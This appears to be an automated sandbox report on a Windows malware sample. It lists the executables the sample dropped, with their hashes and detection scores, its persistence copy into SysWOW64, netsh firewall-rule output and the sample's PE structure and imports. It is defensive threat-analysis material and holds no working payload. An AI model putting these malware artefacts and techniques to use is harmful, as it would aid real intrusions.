                                            C:\Users\user\AppData\Local\Temp\CCB2.exe
                                            Process:C:\Windows\explorer.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):324608
                                            Entropy (8bit):6.705560699768563
                                            Encrypted:false
                                            SSDEEP:6144:8cXfhxLWOCPRZa9XQ9XuxYADj5QTM44lq46Ue:8cXfhxKPZyK+x3NQN4l3Je
                                            MD5:043B44289E31BD54357F9A5C21833259
                                            SHA1:C042C1D364887BBF71B070C8DD6C66C08A818834
                                            SHA-256:8DC59F6481C6FE183ADAC2B720FFA276CC9F52D83521200B1A85BB5FF8E4046A
                                            SHA-512:AC7098ED6CC6922577D0C87F4E3BA6EF32973C1641C98B3C675EFBBC548A63346DE87A0026ADB850144B120604BB7B9982A69E1AA2859D0E0A3A0CCE08573756
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            Reputation:unknown
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,..~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L...o.}`............................P.............@.................................[.......................................t...P.......(...............................................................@...............L............................text............................... ..`.data...............................@....zic................................@....wuvuhus............................@....jufot..............................@....rsrc...(............$..............@..@.reloc..dF.......H..................@..B................................................................................................................................................................................................................................................................
                                            C:\Users\user\AppData\Local\Temp\D502.exe
                                            Process:C:\Windows\explorer.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):54272
                                            Entropy (8bit):4.125149292696976
                                            Encrypted:false
                                            SSDEEP:192:s7yxMfjf6NrLqKZ6mXS9LzL1pvULIRPqY2F3991ZuBhyY8PGCz9QwAOSZCGQyBbf:KyufjSLq86mXS9LzLdqY2LHZ4cZA
                                            MD5:1B1E4286625BB189A526E910F2031C7B
                                            SHA1:650C0550F12C65D9841D10AB589FF39261018957
                                            SHA-256:C9D7CB68DEC80469C3C03B0E90C7AF1972462CA7779424DB3BFD9D44AEBAA624
                                            SHA-512:68F2366606B658FDDB2B5E9BAE2E6931FB455A230F8A4813EACB38A3D7853B9640F46FE9EE6FFD9862A509558B66C30A3494CB7231C3EF7CD784950771273155
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            Reputation:unknown
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....vL..........."...0..............5... ...@....@.. ....................... ............@..................................4..O....@..\............................4............................................... ............... ..H............text........ ...................... ..`.rsrc...\....@......................@..@.reloc..............................@..B.................4......H........#..`............3...............................................0..:........(.......(....(.....s......o.....(.......(....(.......+..*".(.....*..0............ ...(....r...p......%.."...(.....(...........%. N..."....o....&. ....(........&.....&...(....r...pr5..pr9..p(..........%..'...(.....(....s..........%.r;..p.o....t.....+..*........B..Q.......0..7.........(.............,.....i(.....(.....o....&s .....(....o!...o"....s#......o$.....+...(%.........o&...o'.......((..
                                            C:\Users\user\AppData\Local\Temp\D936.exe
                                            Process:C:\Windows\explorer.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):320512
                                            Entropy (8bit):6.685128709167328
                                            Encrypted:false
                                            SSDEEP:6144:BVMH4gQJqHQsl0yMo5DLaniwlnKh8MKxjDSmoETpqy:BVMY+lGiLlqKhexjpoEH
                                            MD5:9517CA2BC20EC061024C1209970CCD2E
                                            SHA1:5A3886349DEB4B7E6BA272304779C0C050BCDDCB
                                            SHA-256:07750C17A95131F145A3CD2418E0BBF031963537C7F2A1BCB4AEAB1D63EC8510
                                            SHA-512:51E289B0AC2F7D3083666B7707C415BE5EFC18CB8F4592288ADF768BF3990A6150A99F8B46FA283F74DE6D9556C9886303DA3E5D6A6B60E6BE0E086B2B230044
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            Reputation:unknown
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,..~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L...Q.._..........................................@............................................................................P.......(...............................................................@...............L............................text............................... ..`.data...............................@....lih................................@....cazelob............................@....pox................................@....rsrc...(...........................@..@.reloc..ZF.......H..................@..B................................................................................................................................................................................................................................................................
                                            C:\Users\user\AppData\Local\Temp\E3A9.exe
                                            Process:C:\Windows\explorer.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):3576320
                                            Entropy (8bit):7.9976863291960605
                                            Encrypted:true
                                            SSDEEP:49152:Y+RSFqeQKgdJee+ntOkgd+TuRCg+687ZEYNFvKfDIcK8nAONaGGh:Yb8eQKg+tOV0T0z875NFKfDPK8nASA
                                            MD5:5800952B83AECEFC3AA06CCB5B29A4C2
                                            SHA1:DB51DDBDF8B5B1ABECD6CFAB36514985F357F7A8
                                            SHA-256:B8BED0211974F32DB2C385350FB62954F0B0F335BC592B51144027956524D674
                                            SHA-512:2A490708A2C5B742CEB14DE6E2180C4CB606FCCEB5F17DE69249CF532EDC37B984686B534A88AE861CC38471C5892785C26DA68C4F662959542458C583E77E38
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            Reputation:unknown
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.................$...................@....@...........................S......!7.....................................|.N. .... M...................................................................................................................... ..........................@................0......................@................@...z..................@............ ...0......................@...........x+...P......................@.............1.........................@....rsrc........ M......L0.............@....28gybOo......N.......1.............@....adata.......pS.......6.............@...........................................................................................................................................................................................................................................................................
                                            C:\Users\user\AppData\Local\Temp\FB58.exe
                                            Process:C:\Windows\explorer.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):905216
                                            Entropy (8bit):7.399713113456654
                                            Encrypted:false
                                            SSDEEP:12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
                                            MD5:852D86F5BC34BF4AF7FA89C60569DF13
                                            SHA1:C961CCD088A7D928613B6DF900814789694BE0AE
                                            SHA-256:2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
                                            SHA-512:B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: Metadefender, Detection: 34%, Browse
                                            • Antivirus: ReversingLabs, Detection: 77%
                                            Reputation:unknown
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................g.....q.I....v....h......E....x.....f.....c...Rich..................PE..L....[._................. ...2.......0.......0....@..........................P|......q......................................Xf..(....p.. ............................1..............................@Y..@............0...............................text............ .................. ..`.rdata.."?...0...@...$..............@..@.data...8....p.......d..............@....rsrc... .n..p......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                            C:\Users\user\AppData\Local\Temp\krmdinzg.exe
                                            Process:C:\Users\user\AppData\Local\Temp\D936.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):10624000
                                            Entropy (8bit):3.8323533062805604
                                            Encrypted:false
                                            SSDEEP:12288:GVMY+lGiLlqKhexjpoEHQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ3:SIl0I4jq
                                            MD5:C8DE2E3F0DF5D9E1C126828B1444DBEA
                                            SHA1:568F6EDAFCFAA907DC199443324666D4F7BA6BFB
                                            SHA-256:B62D0D45AB934497D91566E94D2FA277A6726CEC40DD4D50CFEC6F898E43A538
                                            SHA-512:20BED97AB819B162DE12BCF7942B254339E5F263478781B272AF943DB03691EA8EC3F130AE97F72C0289DA0BA320929BEDFC900CAA4EDAB4B76FEB0661949014
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            Reputation:unknown
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,..~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L...Q.._..........................................@............................................................................P.......(...............................................................@...............L............................text............................... ..`.data...............................@....lih................................@....cazelob............................@....pox................................@....rsrc...(...........................@..@.reloc..ZF..........................@..B................................................................................................................................................................................................................................................................
                                            C:\Users\user\AppData\Roaming\jgdhbua
                                            Process:C:\Windows\explorer.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):320512
                                            Entropy (8bit):6.688597828759442
                                            Encrypted:false
                                            SSDEEP:6144:zVMKim/rLWU5lbsbe8USFaX6EUNoO3Ez5B+D240obIIZfGd:zVMkfCeiFNbmOUFB+T0oXud
                                            MD5:31F0D01EE1FD6876668692791657D97E
                                            SHA1:A45A34A020AD13C9373BD14C45268004F505E1E1
                                            SHA-256:8FACF32116A5F68467C71032D3A207ABAA20FBCC56FCAB6A3DB650B4D30AD115
                                            SHA-512:7E737CFE1DB59AEF0BADA3184C059720EBB5744ADD725246E5A600E6CC1A3B6D0AA6B19EC6B90F5C1C1C0253D96B7A8C390594A9E0D14E35F45C9DBD1089917A
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            Reputation:unknown
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,..~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L.....`..........................................@.............................................................................P.......(...............................................................@...............L............................text...~........................... ..`.data...............................@....kipex..............................@....him................................@....hakir..............................@....rsrc...(...........................@..@.reloc..ZF.......H..................@..B................................................................................................................................................................................................................................................................
                                            C:\Users\user\AppData\Roaming\jgdhbua:Zone.Identifier
                                            Process:C:\Windows\explorer.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:3:ggPYV:rPYV
                                            MD5:187F488E27DB4AF347237FE461A079AD
                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                            Malicious:true
                                            Reputation:unknown
                                            Preview: [ZoneTransfer]....ZoneId=0
                                            C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe (copy)
                                            Process:C:\Windows\SysWOW64\cmd.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):10624000
                                            Entropy (8bit):3.8323533062805604
                                            Encrypted:false
                                            SSDEEP:12288:GVMY+lGiLlqKhexjpoEHQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ3:SIl0I4jq
                                            MD5:C8DE2E3F0DF5D9E1C126828B1444DBEA
                                            SHA1:568F6EDAFCFAA907DC199443324666D4F7BA6BFB
                                            SHA-256:B62D0D45AB934497D91566E94D2FA277A6726CEC40DD4D50CFEC6F898E43A538
                                            SHA-512:20BED97AB819B162DE12BCF7942B254339E5F263478781B272AF943DB03691EA8EC3F130AE97F72C0289DA0BA320929BEDFC900CAA4EDAB4B76FEB0661949014
                                            Malicious:true
                                            Reputation:unknown
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,..~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L...Q.._..........................................@............................................................................P.......(...............................................................@...............L............................text............................... ..`.data...............................@....lih................................@....cazelob............................@....pox................................@....rsrc...(...........................@..@.reloc..ZF..........................@..B................................................................................................................................................................................................................................................................
                                            C:\Windows\appcompat\Programs\Amcache.hve
                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                            File Type:MS Windows registry file, NT/2000 or above
                                            Category:dropped
                                            Size (bytes):1572864
                                            Entropy (8bit):4.237236426202636
                                            Encrypted:false
                                            SSDEEP:12288:FHIJeoqgeg5Fu/+BTQ9S1gTbMzZHogTtvN7r8XcfGa+2LXOU:lIJeoqgeg5I/+BjuM
                                            MD5:01943BF0494A56FD1AF5097441A3E2FC
                                            SHA1:4CF795A460778BD03A6A2749446779DDCDFCEC54
                                            SHA-256:862DA49FCA1E84DA44B0D9C45AD8508A03150FF8507F67620DB7AE11996AC6CB
                                            SHA-512:5779CCC50C91B4407A3E4DE37335B04E8D6DDC6276C5D75588E566975096EF057B444BD7AC22ACCD223AFF7FA79BB9FEF4475584DC3A76DD6C7DA54D33675DFC
                                            Malicious:false
                                            Reputation:unknown
                                            Preview: regfH...H...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm....}................................................................................................................................................................................................................................................................................................................................................Y.Z........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                            File Type:MS Windows registry file, NT/2000 or above
                                            Category:dropped
                                            Size (bytes):20480
                                            Entropy (8bit):3.3450377575042998
                                            Encrypted:false
                                            SSDEEP:384:ybC5K5th4KgnVVeeDzei1NKZtjaT8GNwf3JC1M8I:i8KZg/eeDzesNYtjnGNwf2M8
                                            MD5:A2DE4322DAE6C2648B667D68B52FD8FF
                                            SHA1:B54F25C4DA3A3B828D3226F549164FDC540FF1B4
                                            SHA-256:F914769C1902117E0711746610EB7EE84F726B27CF539EC2B72214C58FD858EE
                                            SHA-512:3B53D772597F6654B54F9B8EC024DF9FAFD90BE702BB13FC3E1E95B257E165756388143DAD362F5CAA874DA6446180B6A42A287FBAC84D49FEE37628F3019259
                                            Malicious:false
                                            Reputation:unknown
                                            Preview: regfG...G...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm....}................................................................................................................................................................................................................................................................................................................................................Y.ZHvLE.N......G...........L..A..O."...~....................... ..hbin................p.\..,..........nk,.....}................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .....}....... ........................... .......Z.......................Root........lf......Root....nk .....}................................... ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck.......p...
                                            \Device\ConDrv
                                            Process:C:\Windows\SysWOW64\netsh.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):3773
                                            Entropy (8bit):4.7109073551842435
                                            Encrypted:false
                                            SSDEEP:48:VHILZNfrI7WFY32iIiNOmV/HToZV9It199hiALlIg39bWA1RvTBi/g2eB:VoLr0y9iIiNOoHTou7bhBlIydWALLt2w
                                            MD5:DA3247A302D70819F10BCEEBAF400503
                                            SHA1:2857AA198EE76C86FC929CC3388A56D5FD051844
                                            SHA-256:5262E1EE394F329CD1F87EA31BA4A396C4A76EDC3A87612A179F81F21606ABC8
                                            SHA-512:48FFEC059B4E88F21C2AA4049B7D9E303C0C93D1AD771E405827149EDDF986A72EF49C0F6D8B70F5839DCDBD6B1EA8125C8B300134B7F71C47702B577AD090F8
                                            Malicious:false
                                            Reputation:unknown
                                            Preview: ..A specified value is not valid.....Usage: add rule name=<string>.. dir=in|out.. action=allow|block|bypass.. [program=<program path>].. [service=<service short name>|any].. [description=<string>].. [enable=yes|no (default=yes)].. [profile=public|private|domain|any[,...]].. [localip=any|<IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [remoteip=any|localsubnet|dns|dhcp|wins|defaultgateway|.. <IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [localport=0-65535|<port range>[,...]|RPC|RPC-EPMap|IPHTTPS|any (default=any)].. [remoteport=0-65535|<port range>[,...]|any (default=any)].. [protocol=0-255|icmpv4|icmpv6|icmpv4:type,code|icmpv6:type,code|.. tcp|udp|any (default=any)].. [interfacetype=wireless|lan|ras|any].. [rmtcomputergrp=<SDDL string>].. [rmtusrgrp=<SDDL string>].. [edge=yes|deferapp|deferuser|no (default=no)].. [security=authenticate|authenc|authdynenc|authnoencap|

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):6.688597828759442
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.83%
                                            • Windows Screen Saver (13104/52) 0.13%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:ECD2MpEBSf.exe
                                            File size:320512
                                            MD5:31f0d01ee1fd6876668692791657d97e
                                            SHA1:a45a34a020ad13c9373bd14c45268004f505e1e1
                                            SHA256:8facf32116a5f68467c71032d3a207abaa20fbcc56fcab6a3db650b4d30ad115
                                            SHA512:7e737cfe1db59aef0bada3184c059720ebb5744add725246e5a600e6cc1a3b6d0aa6b19ec6b90f5c1c1c0253d96b7a8c390594a9e0d14e35f45c9dbd1089917a
                                            SSDEEP:6144:zVMKim/rLWU5lbsbe8USFaX6EUNoO3Ez5B+D240obIIZfGd:zVMkfCeiFNbmOUFB+T0oXud
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,...~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L......`...........................

                                            File Icon

                                            Icon Hash:c8d0d8e0f8e0f4e8

                                            Static PE Info

                                            General

                                            Entrypoint:0x41b4a0
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                            Time Stamp:0x60A4EF0B [Wed May 19 10:57:15 2021 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:5
                                            OS Version Minor:0
                                            File Version Major:5
                                            File Version Minor:0
                                            Subsystem Version Major:5
                                            Subsystem Version Minor:0
                                            Import Hash:6801e04a0c2ca60ac2497c0d8723846b

                                            Entrypoint Preview

                                            Instruction
                                            mov edi, edi
                                            push ebp
                                            mov ebp, esp
                                            call 00007F6C9515778Bh
                                            call 00007F6C9514A706h
                                            pop ebp
                                            ret
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            mov edi, edi
                                            push ebp
                                            mov ebp, esp
                                            push FFFFFFFEh
                                            push 0043DA98h
                                            push 0041E680h
                                            mov eax, dword ptr fs:[00000000h]
                                            push eax
                                            add esp, FFFFFF94h
                                            push ebx
                                            push esi
                                            push edi
                                            mov eax, dword ptr [00440354h]
                                            xor dword ptr [ebp-08h], eax
                                            xor eax, ebp
                                            push eax
                                            lea eax, dword ptr [ebp-10h]
                                            mov dword ptr fs:[00000000h], eax
                                            mov dword ptr [ebp-18h], esp
                                            mov dword ptr [ebp-70h], 00000000h
                                            mov dword ptr [ebp-04h], 00000000h
                                            lea eax, dword ptr [ebp-60h]
                                            push eax
                                            call dword ptr [0040109Ch]
                                            mov dword ptr [ebp-04h], FFFFFFFEh
                                            jmp 00007F6C9514A718h
                                            mov eax, 00000001h
                                            ret
                                            mov esp, dword ptr [ebp-18h]
                                            mov dword ptr [ebp-78h], 000000FFh
                                            mov dword ptr [ebp-04h], FFFFFFFEh
                                            mov eax, dword ptr [ebp-78h]
                                            jmp 00007F6C9514A847h
                                            mov dword ptr [ebp-04h], FFFFFFFEh
                                            call 00007F6C9514A884h
                                            mov dword ptr [ebp-6Ch], eax
                                            push 00000001h
                                            call 00007F6C9515816Ah
                                            add esp, 04h
                                            test eax, eax
                                            jne 00007F6C9514A6FCh
                                            push 0000001Ch
                                            call 00007F6C9514A83Ch
                                            add esp, 04h
                                            call 00007F6C951537E4h
                                            test eax, eax
                                            jne 00007F6C9514A6FCh
                                            push 00000010h

                                            Rich Headers

                                            Programming Language:
                                            • [ C ] VS2008 build 21022
                                            • [IMP] VS2005 build 50727
                                            • [ASM] VS2008 build 21022
                                            • [LNK] VS2008 build 21022
                                            • [RES] VS2008 build 21022
                                            • [C++] VS2008 build 21022

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x3e1c40x50.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1500000x8728.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1590000x1df8.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x13a00x1c.text
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x91000x40.text
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x10000x34c.text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000x3e57e0x3e600False0.582117359719data6.96486152385IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                            .data0x400000x10c9880x1800False0.340657552083data3.47052178831IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                            .kipex0x14d0000x50x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                            .him0x14e0000xea0x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                            .hakir0x14f0000xd930xe00False0.00697544642857data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                            .rsrc0x1500000x87280x8800False0.594812729779data5.84048651179IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0x1590000x465a0x4800False0.347710503472data3.69715033583IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountry
                                            AFX_DIALOG_LAYOUT0x1570480x2dataDutchNetherlands
                                            AFX_DIALOG_LAYOUT0x1570400x2dataDutchNetherlands
                                            AFX_DIALOG_LAYOUT0x1570500x2dataDutchNetherlands
                                            AFX_DIALOG_LAYOUT0x1570580x2dataDutchNetherlands
                                            CIDAFICUDUROSOTAROM0x1566280x6c7ASCII text, with very long lines, with no line terminatorsAssameseIndia
                                            VIDIWAYAPENIGU0x156cf00x2faASCII text, with very long lines, with no line terminatorsAssameseIndia
                                            RT_CURSOR0x1570600x8a8dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"DutchNetherlands
                                            RT_ICON0x1507400x6c8dataAssameseIndia
                                            RT_ICON0x150e080x568GLS_BINARY_LSB_FIRSTAssameseIndia
                                            RT_ICON0x1513700x10a8dataAssameseIndia
                                            RT_ICON0x1524180x988dBase III DBT, version number 0, next free block index 40AssameseIndia
                                            RT_ICON0x152da00x468GLS_BINARY_LSB_FIRSTAssameseIndia
                                            RT_ICON0x1532580x8a8dataAssameseIndia
                                            RT_ICON0x153b000x6c8dataAssameseIndia
                                            RT_ICON0x1541c80x568GLS_BINARY_LSB_FIRSTAssameseIndia
                                            RT_ICON0x1547300x10a8dataAssameseIndia
                                            RT_ICON0x1557d80x988dataAssameseIndia
                                            RT_ICON0x1561600x468GLS_BINARY_LSB_FIRSTAssameseIndia
                                            RT_STRING0x1579200xe4dataDutchNetherlands
                                            RT_STRING0x157a080x3bcdataDutchNetherlands
                                            RT_STRING0x157dc80x6e6dataDutchNetherlands
                                            RT_STRING0x1584b00x1a0dataDutchNetherlands
                                            RT_STRING0x1586500xd8dataDutchNetherlands
                                            RT_ACCELERATOR0x1570000x10dataDutchNetherlands
                                            RT_ACCELERATOR0x156ff00x10dataDutchNetherlands
                                            RT_GROUP_CURSOR0x1579080x14dataDutchNetherlands
                                            RT_GROUP_ICON0x1532080x4cdataAssameseIndia
                                            RT_GROUP_ICON0x1565c80x5adataAssameseIndia
                                            None0x1570200xadataDutchNetherlands
                                            None0x1570300xadataDutchNetherlands
                                            None0x1570100xadataDutchNetherlands

                                            Imports

                                            DLLImport
                                            KERNEL32.dllDeactivateActCtx, GetVersionExW, SetConsoleCP, GetConsoleAliasesLengthA, GetDefaultCommConfigA, FindFirstFileExW, GetDriveTypeA, FreeEnvironmentStringsA, SetProcessPriorityBoost, SetVolumeMountPointW, GetLongPathNameW, CopyFileA, TlsGetValue, GetConsoleCursorInfo, SetComputerNameExA, SystemTimeToTzSpecificLocalTime, FindAtomA, ReleaseSemaphore, CallNamedPipeA, CreateMailslotA, BuildCommDCBAndTimeoutsW, VirtualProtect, LoadLibraryA, LocalAlloc, TryEnterCriticalSection, GetCommandLineW, InterlockedDecrement, GetCalendarInfoA, DeleteFileA, CreateActCtxW, CreateRemoteThread, SetSystemTimeAdjustment, SetPriorityClass, WritePrivateProfileStringW, GetProcessHeap, GlobalUnWire, ReadConsoleOutputCharacterW, GetStartupInfoW, GetDiskFreeSpaceExA, GetCPInfoExA, GetWindowsDirectoryW, GetSystemWow64DirectoryW, GetLastError, GetProfileStringW, WriteProfileSectionW, GetProfileStringA, SetLastError, DeleteVolumeMountPointA, DebugBreak, lstrcmpA, ReadFileScatter, SetConsoleMode, GetVersion, GetSystemWindowsDirectoryW, GlobalFindAtomA, FindCloseChangeNotification, GetTapeParameters, SetMailslotInfo, InterlockedExchange, DefineDosDeviceW, FindVolumeMountPointClose, EndUpdateResourceA, WriteConsoleA, GetSystemTimeAdjustment, WritePrivateProfileSectionA, GetPrivateProfileStructW, GetFileAttributesExA, MoveFileW, GetVolumePathNameA, HeapUnlock, lstrcmpW, SetDefaultCommConfigW, GetExitCodeProcess, ResetEvent, GetThreadContext, MoveFileExW, GetProcAddress, GlobalLock, UnregisterWaitEx, BuildCommDCBW, PeekConsoleInputW, GetBinaryTypeW, CreateSemaphoreW, TransmitCommChar, WaitNamedPipeA, GetOverlappedResult, GetPrivateProfileSectionNamesW, FindResourceExW, EnumTimeFormatsW, GetLocalTime, CreateSemaphoreA, FreeEnvironmentStringsW, GetPrivateProfileSectionW, SetFileShortNameA, lstrcpyA, VerLanguageNameW, SetThreadExecutionState, SetSystemTime, LockFile, VerSetConditionMask, GetConsoleAliasA, FlushConsoleInputBuffer, FreeConsole, GetAtomNameW, GetConsoleAliasExesLengthA, WriteConsoleInputW, TransactNamedPipe, EnumDateFormatsA, SetCommState, FileTimeToLocalFileTime, _lopen, GetConsoleAliasExesLengthW, GetWriteWatch, GetModuleHandleW, WriteConsoleOutputCharacterA, GetConsoleMode, HeapFree, OpenMutexA, LocalLock, GetCommMask, SetEndOfFile, FindClose, CreateIoCompletionPort, SetFileApisToANSI, CancelWaitableTimer, GetProcessHandleCount, UnregisterWait, GetConsoleAliasesLengthW, GetCurrentProcessId, lstrcpynA, SetNamedPipeHandleState, GetCompressedFileSizeA, FindNextVolumeMountPointW, GetFullPathNameA, WriteProfileStringA, DeleteAtom, GlobalAddAtomW, AssignProcessToJobObject, QueryDosDeviceW, InitializeCriticalSection, Process32NextW, SetCurrentDirectoryA, GetBinaryTypeA, FindActCtxSectionGuid, TerminateProcess, MoveFileA, RaiseException, HeapValidate, IsBadReadPtr, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameW, GetModuleHandleA, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, InterlockedIncrement, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, TlsAlloc, TlsSetValue, GetCurrentThreadId, TlsFree, Sleep, ExitProcess, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, GetEnvironmentStringsW, HeapDestroy, HeapCreate, VirtualFree, GetModuleFileNameA, WriteFile, HeapAlloc, HeapSize, HeapReAlloc, VirtualAlloc, RtlUnwind, 